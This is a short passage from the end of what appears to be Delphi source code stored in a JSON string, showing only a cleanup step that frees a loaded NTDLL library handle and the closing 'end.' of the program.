(hNTDLL <> 0) then\r\n FreeLibrary(hNTDLL);\r\n\r\n\r\nend."
}
]
}
